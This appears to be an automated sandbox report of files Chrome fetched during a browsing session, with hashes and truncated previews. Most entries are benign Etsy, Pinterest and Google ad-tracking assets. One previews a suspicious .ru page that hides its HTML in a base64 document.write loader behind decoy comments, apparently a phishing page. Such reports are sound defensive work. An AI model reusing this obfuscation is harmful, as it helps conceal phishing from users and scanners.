                                                                                                                                                                Preview:RIFF....WEBPVP8 .....r...*,.,.>E".E".!.y.p(.D..p.D.;.-`k.H....,K:....g.'..M.">...S...0?..V.a|..#.j......S......Tv.4V....S.......=..K.....O..Q~......fN</..S..T...G.:.b?.G..M..H.....YZ~..@...d.R[..#.....yVB;d...<<s.l....bw.m,.x0...=......uO..C/I.....,...i..V+y#.,yh..&......p.u.;H..E...j^..^.tj.....!.VoK..[8;.._....A"Vv..?..1h.^...%.dT..Q.-.<._..]F...s.....[z..K0..f{3j..';.9/.,......q.g.G!...F..s...!.8.Q..&f.....D...%.k&.E^.5_-KI...2....,..nU.Y.{h1P..3j.vU..V8",._.@..T..v'......o>CGN.....e.[....,;7....YA...Y".8..U.}.Q.?;/........f.d*.|..e.l...W.._....`....$.Q/...,.QR..).;3...h....`......2,(}..K5P#.."r'Jg.4`T.k#..|...#,..=*N.N.s.q.8f.EE..3.09..f.._w...K..CX.....7_.....v[..4@.&..ke ..5/.x.w....y...G.;..&..........-.>*H.37m..x=V..d...H..VX..y..[.c. .......$J.5K.N....v&!.X.{...4.....}=..'K.m.l.\.z.Nq..(.v~.....[..R.5.......j.bw...t......9..........3....9...:..K.=..[[)}BDjAy..!{l.]........&.....V..w..7l.JP..`.C.C.y/..w."./Dy .........y.l._l.-.f.'
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (565), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):565
                                                                                                                                                                Entropy (8bit):5.013395369899308
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:433CBAC690542626F503B4269A8DA12A
                                                                                                                                                                SHA1:3E810BC4ABACCF42AC5E4B0B939D63C03711BBD9
                                                                                                                                                                SHA-256:F83B1A3EA61AD62E47FAD82DE5495A2547E2F12E591AD8108050538C566AE1E3
                                                                                                                                                                SHA-512:569B3D704F2A979D16624064ABD3B97F38EEA3C9A5F3F09D31C9B83D62C360717F6F66EE44A6B53686760421A57D7EB4ABD54904556B105B05AA81D5850F34B9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://ct.pinterest.com/ct.html
                                                                                                                                                                Preview:<!DOCTYPE html><html lang="en"><head><title>Pinterest ct</title></head><body><div id="root"></div><script>window.addEventListener("message", (event) => {if (event.origin != "https://www.pinterest.com") {return;}try {if (event.data.key == "_epik_localstore") {window.localStorage.setItem(event.data.key, event.data.value);}} catch (error) {}}, false);window.addEventListener("load", (event) => {try {window.parent.postMessage({ key: "_epik_localstore", value: window.localStorage.getItem("_epik_localstore") }, "*")} catch (error) {}}, false);</script></body></html>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):21212
                                                                                                                                                                Entropy (8bit):7.974349138275704
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:A3A21F63354C30452A31F6BD5E02F3D4
                                                                                                                                                                SHA1:F585BEA34B26AFB776E6533DDDC457FE3EB15887
                                                                                                                                                                SHA-256:A9AC4CE5A46E51B1CCF3AA23C4A29971E46399A822CBFC42207039C9EE7B5F30
                                                                                                                                                                SHA-512:7F81C1E93B99874265C254026C100ACA64E7BAF219084E02C6D99794896F4D26CCA7C8446CE4BC99EC682CDAFFEE7D0377CC67D9A607F2B4B35AE1CE9F7F16B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF............................................................................%%2..............................................................%%2......,.,.."..........8......................................................................d......B.\P.@L.P....!.l..&'.&.............T..A'.A..Qa...Q.]..UUM@W......." ."..(f...ahL>(@X.K..L.."U.D1r.$X..')......n..e.....g\.......b.d.~E..1RLb...n..D..Pbr'.f.._.....i&..Wm.I0..c:.:...5Kv..M...N..v**1...z...z....:.D...=.TM..u\>;."..t.Z..X:y'.y..F8~.......t=.W..K...l@...'.#..y.`\..z...'b`....FH.X.!q.ulk..O...G.3K....=........~_.JA>.>{^9.@..Rz5.FW..[kn......#.O..g.w.t.we....v?*..'..RL.>.)*..".B9...Y.p.G.......C-~$..........h.....b...n1..z...].{...L.hp..^.V.z...}..6......n6.>.H,.x.J.t....a..;...."...q.).. ..Q.#...X+.9Mr..&J.6...w..._.t..Ku......=A.....KE.iv.Q..A.k...E..qs..z........}.{...\.....k..oh.IoP...9%aJb.1...()b9]zs^.m1.jX..h..5G.y..N....s$.c\..H.~+.g.3......{.]_{..........r...(....W.y.}........#.L..{~
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):16354
                                                                                                                                                                Entropy (8bit):7.988288252868818
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:9AA7903C7BD19901C88C58EDD13D78C9
                                                                                                                                                                SHA1:1838D2D187051CA24E7EEBE1844CFE23F44ADA79
                                                                                                                                                                SHA-256:19A44457CB72DBBA0B5C139FCDF5CD7FB9CB1EA7D6DBD17EBDFA6005D4F9C9F0
                                                                                                                                                                SHA-512:AF3F70B709A501B9F67AEAAB7E20C24FD9B2A770616D2BCBB3A4C9E6A6C65395ED28FDC4B7822D2EF1D5C6D42050C40BF44D605CC4BCB8C4184C5E786B37230B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/30607862/c/2447/2447/0/282/il/e66137/5288720834/il_300x300.5288720834_bp2c.jpg
                                                                                                                                                                Preview:RIFF.?..WEBPVP8 .?..p....*,.,.>E..D"......(.D.8.Xe2.].{.6>;.g..}....b............i...?......^.....u.v=.?......#....W.g.7....._.^.....d9..`.....8....|...B..........A.?.....}6.!..GI_.\..l.k..-...".{z~F~"..............Ydx=.u.Y.c.....1U.X....c]..gd....../..._....%...z[v[...t.9..j..u...h...Z..E.'...u.0.....V.%.........ro.l.(...R.....D..d._..O.Dqc(.N..<../...+.w..&o#.7.uj.{:.y..hH].....#"]....V....\P.9`!B..'dpv!(.^.../.`r.0/.W.G.\|N..<.x...3.... .......F....F.G.a.I.S%.U...:W@.G..`..mb^...9.C%....=.a..}(/.<........^m.R[.....=ID6"...Dm.7....^bj.+.....A_...gX..Y.....1.a)........I.*.I:../.J..(...xT.).....2.......Z..p.^.......7\.g..|:z...b9.....m..t.TX....._..N..2..f.o.y....U...-~O....6..F..>./.@...G.Yq.A.0z..$`.. e..y.."A.....].....$..1..r..a..........ZSu.......w>.J[..7..(#|5......:....]x.*a......~l..w.(Y..........Y.Jl.2}!......aO2..D......9..U.@.fR u"..@....^.......s...Rt..Y.....L.....#Cl..2.0x..L......j..ql.j.E...r. .3.S-|q
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 340x270, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):9624
                                                                                                                                                                Entropy (8bit):7.982045281364564
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:58BE76988401501B1877899109290534
                                                                                                                                                                SHA1:63596FC5B346088823FE6D08EB4085C1A1F40276
                                                                                                                                                                SHA-256:6F010DF1E0CA0A925FE0FA174DF1EDB16B2C48D0CB01079CEBB6727695579BA0
                                                                                                                                                                SHA-512:4548ACD5B356F7E7FFE76B98E591714D55C48CF3F9D42620E02F7B64D3A7595A943FD3238AD394D2ED4EAD98AD9E167CDF2B019C04C7F3040D9826868790D4A0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/17370771/r/il/17194d/4296892055/il_340x270.4296892055_f7yi.jpg
                                                                                                                                                                Preview:RIFF.%..WEBPVP8 .%..0....*T...>E..E"..".R+(P..cn..4J...P..b...................~o.......z.#....c....~...z....^?........5...?.!c....@>.....1....D.\z...{ .a$..#V.D..b`..[0g7;.'m.Z.&._......}..uS..E#..9..q.rke-l.i:.=/...../.6.Oe'.M..F...&..g....M<...pm\jG.........;X;..;.,.,HO.P.r.A{b.L!u...(q..k..+..[R..b.k....].Bs......YI...B.4..~.~.......K..T.0.g+S..=+{{..h!....Nk ...DB.....B.R.`G.."}.r.&.....Y.e.7[.f..r..JJ...v>.....Pz..e}=....:..).3b....w.5....q.c.wfVy....c+..z[........P...N:.u..d.O ..Q..O.".....q9g....L..Df..Q...^.U$......e.Y[.5...p..6.......$.../.(.4R....f.{.i. ....w7U@.....vf......qlq&^..h../.....{......i.."...$...Tk...<.....oS...j.:....F...L........G 4.W..!.....`......AH.....T..w(.P...[.8....l..yB....`.;-W...p.g..q..W..o.u...l....I....*q......qd..2..di.2.9apn....M...Va.Z..!\v.W..0c.DT...Z..q..f.../..9. ..9....&+..'.B}2...w..l..lq.=....6^....R..B..z-...U.l.M,}&.t..l..}(-....J..[*M....t..3.....#.b..' 5..5>....k....yV..P.|x........Z....0..
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 680x540, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):73792
                                                                                                                                                                Entropy (8bit):7.9801739532929385
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1C05D79F02ACAF4ACE85E11501648DBC
                                                                                                                                                                SHA1:2FA263ED8D2139A4B41E85726F30CAFF68481BB7
                                                                                                                                                                SHA-256:376B40D2D635B80E9AFC700377DD2C3F048B908F7F12BE3E2BEB5C4A9A28F8AC
                                                                                                                                                                SHA-512:142E6D02D99AB6C7E8A72833E8444735C07943FD9B351DF75CCF5D541C4D7825DCBD7DC84F12285901D442D432A8B6305D270C160CD9B39921A27B48C49912CC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0....................................................................%%2..............................................................%%2..........."..........8.....................................................................6 [~z.$yB."....Q.$...d.-.<.E...dM...wu.(.L..}.DR..h6Q..-#....+4nQk..=.S...S.A.u....v..9]].....L<J.y.n.+.6L.;.....5.G./0.O..10..h..m#<..j...O.bFXD.tNu.(t..;.J..t.1c.....X.6l.C# ..!G.FE<...h.D.a......5[8
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (1615)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):19809
                                                                                                                                                                Entropy (8bit):5.339983320439078
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C720002805746DABED07FFFAD3441370
                                                                                                                                                                SHA1:31F7E934EDA30C4837E3F276F1D86AFE79E75753
                                                                                                                                                                SHA-256:CEAD3EC262B19EAB66896B105AF98BC13A04E856BFA3C8994378D4EBDCDB2A71
                                                                                                                                                                SHA-512:C63997E34671524E7723E8D55B609B8BF30A09661411C784726A22E89B0966B9BA86E6D167CCA0CA5FC4DD6330FB10E1AD3D10E7FEACB012F6EF123DD483310B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://web.btncdn.com/v1/button.js
                                                                                                                                                                Preview:(function(){try{var h=this;function k(a,c){var b=aa;return!!a||(b.log(c),!1)}function ba(a){return a}function l(a,c){for(var b=c.split(".");b.length&&a;)a=a[b.shift()];return a}function n(a,c){if(!Array.isArray(a))return!1;c=c||ba;for(var b=0,d=a.length;b<d;b++)if(!0===c(a[b]))return!0;return!1}function p(a,c,b){a=l(a,c);return"string"===typeof a?a:b||""}function q(a,c){var b=l(a,c);return Array.isArray(b)?b:[]}function r(a,c){for(var b=q(a,c),d=[],e=0,f=b.length;e<f;e++)d.push(t(b[e])?b[e]:{});return d}.function ca(a,c){if(!Array.isArray(a))return null;for(var b=0;b<a.length;b++){var d=a[b];if(c(d))return d}return null}function t(a){return!(!a||a.constructor!==Object)};function u(a,c){var b=(h.ButtonWebConfig||{})[a];return void 0===b?c:b}function x(a,c){var b=u(a,c);return"string"===typeof b?b:c||""}function y(a,c){var b=u(a,c);return"boolean"===typeof b?b:c||!1}function z(a){a=u(a);if("function"===typeof a)return a};var A=void 0;function B(){return"try{"+x("siteCatalyst","s")+".tl(t
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):227740
                                                                                                                                                                Entropy (8bit):5.546297953654079
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5EE999E9FB85BCAFECF3BFD09848ED13
                                                                                                                                                                SHA1:AAA030ECE1EA19750915131B6DDF8E6DE47B7B32
                                                                                                                                                                SHA-256:962CB9B2671DB465B0121E38B1830BC00C6F407BFF5C3FC7598249EEA0E77ED8
                                                                                                                                                                SHA-512:754D10E2EC8FA04B9D6F9D19299E95413D4BB54B8FC544B9963601EABDA21FCA194705F32821E0CDC504B09C2AF6F77E284949B1F3175D819884FD5B1C374758
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.googletagmanager.com/gtag/destination?id=DC-9910951&l=dataLayer&cx=c
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-9910951","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"",
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (5111), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5111
                                                                                                                                                                Entropy (8bit):5.841334474220263
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1B4C9C61248F41DA3627983BB3989254
                                                                                                                                                                SHA1:BED084A5197A5E8A8406EBB6A6FACF6807B3F4AD
                                                                                                                                                                SHA-256:91EBCE1075AE4187A2A8DCFD3FF5955A3FF9F62BEC7893044ACA3DE678C04871
                                                                                                                                                                SHA-512:754ADF60332BC9E8BF1490E1367768839D1D4F9AE835AE60F19B5CB3F6F7B11D278B03F613BB52458A6887C823495CDEDDA3CB68D6C687230BF7D6DA64309D61
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):227750
                                                                                                                                                                Entropy (8bit):5.546476242308811
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:366C227073EE885B9168BAC660644EB3
                                                                                                                                                                SHA1:2AF8D329F85E7EEA9BAB0521F929222E2980F953
                                                                                                                                                                SHA-256:61229B325DC3E69C10E2A4D8963D9D933B2966290C01BB6FBEA0DBF616127F43
                                                                                                                                                                SHA-512:4F8554A759B4218345E14C3F32C1A905C1D797A6DE0D0028B04DD3AE14C0CD65DF52BD152805B6E0330809A9B04C49CB4899F6E9080802B6CC2B9DDDC9730F71
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.googletagmanager.com/gtag/destination?id=DC-8666735&l=dataLayer&cx=c
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-8666735","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"",
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65390)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):781170
                                                                                                                                                                Entropy (8bit):5.586273718685321
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:8C61A79AB14DCDB5BD7E7F0E42509374
                                                                                                                                                                SHA1:787088E59AB4D9C53BC7B93254E7001D4E9355EF
                                                                                                                                                                SHA-256:6D98647233F3468253BA972ABA3E9CB895829010A8D4052F6C762053F0CE3003
                                                                                                                                                                SHA-512:C5B46C4BEA707A012872423D32A5C732385F95EDF20E6C57BDBACFC1EA9D9D0AEE2580E0BAB83628C7FAFC75450F1B35874693FFA13C33A0D44D29541EFF628A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/vesta_homepage/bootstrap.f3f952e4a7f9badcf43a.js
                                                                                                                                                                Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/vesta_homepage/bootstrap.f3f952e4a7f9badcf43a.js.LICENSE.(()=>{var e={92662:(e,t,i)=>{"use strict";i.d(t,{default:()=>o});var n=i(10441);const s={"rate-n-stars":[["{{value}} stars","{{value}} star","{{value}} stars"],[["is",[0]],["is",[1]],["else"]]],"rating-tooltip-1":"Disappointed","rating-tooltip-2":"Not a fan","rating-tooltip-3":"It's okay","rating-tooltip-4":"Like it","rating-tooltip-5":"Love it",loading:"Loading",error:"Error","new-tab":"Opens a new tab","remove-action":"Remove","dismiss-action":"Dismiss","undo-action":"Undo","select-all":"Select all","add-file-label":"Add file","drop-file-or-label":"Drag and drop or","file-size-bytes":"{{size}} b","file-size-kilobytes":"{{size}} kb","file-size-megabytes":"{{size}} mb","file-size-gigabytes":"{{size}} gb","retry-upload":[["Retry uploads","Retry upload","Retry uploads"],[["is",[0]],["is",[1]],["else"]]],"play-full-video":"Play Full Video","resu
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (5111), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):5111
                                                                                                                                                                Entropy (8bit):5.838956878865521
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:CB6A0291587496E6B3590D83F703F953
                                                                                                                                                                SHA1:5E6B6E9CBE31A641679ACF857A359BCE121BE9AA
                                                                                                                                                                SHA-256:4DD51FC9FAD516A60CA66D47A7BC5F2BF499EC70315213DE41AD4861685A7693
                                                                                                                                                                SHA-512:279018C4E6084400844045C34CB26D26B0CD5FBFC70137DAB5ACC34C706EFE0A9C0FD9E9658A9FFD1D81817B622AF18A718EB19C682E56F30E672C60931C4732
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/995917074/?random=1728513240015&cv=11&fst=1728513240015&bg=ffffff&guid=ON&async=1&gtm=45be4a70v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101529666~101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D%3Becomm_pagetype%3Dhome%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (6457), with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):17796
                                                                                                                                                                Entropy (8bit):5.903996476280608
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:9111892A92E1430906E0A8F8B9426101
                                                                                                                                                                SHA1:CE1B815ABAF3FC5782B233CFB554E4F92BE28B99
                                                                                                                                                                SHA-256:47DD03047C84DBFE3529369EB123F3A3F2BDBC4B2EAE208D5CD541211B670A71
                                                                                                                                                                SHA-512:8414DBE984382A05A19A9039B5295ADE353D5F43AF162DFE1E2F848CE96C000B0AC591752F5C24A4ED25280C77C56421F64A53D975E031CC4729088D81DCF722
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://w4.ischievou8.ru/dr2/
                                                                                                                                                                Preview: Don&#039;t be afraid to give up the good to go for the great. -->.. Persistence is the key to achieving great things. -->..<script>../* The way to get started is to quit talking and begin doing. */..if(atob("aHR0cHM6Ly93NC5pc2NoaWV2b3U4LnJ1L2RyMi8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9M
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):286123
                                                                                                                                                                Entropy (8bit):5.5486773873709305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:7AA39E673BA519DFF9906DA1856BDB1A
                                                                                                                                                                SHA1:01C46372EDA4C256639C087054B56BFD6B917F77
                                                                                                                                                                SHA-256:1E18FB89385107C42A0BE13B616D44A8AB4D6FB5FD2340283B03DB1AFACC12BA
                                                                                                                                                                SHA-512:7DA001837CCA55EC6619EF25ED6A60C1D52D9838959D7CB63C097EFAA9F3D287F7A90A8C87048D2263E6B69F0BEB297D1D60D87F2EFE4BC62EA2441B7158E339
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.googletagmanager.com/gtag/destination?id=AW-995917074&l=dataLayer&cx=c
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":17,"vtp_instanceDestinationId":"AW-995917074","tag_id":11},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regi
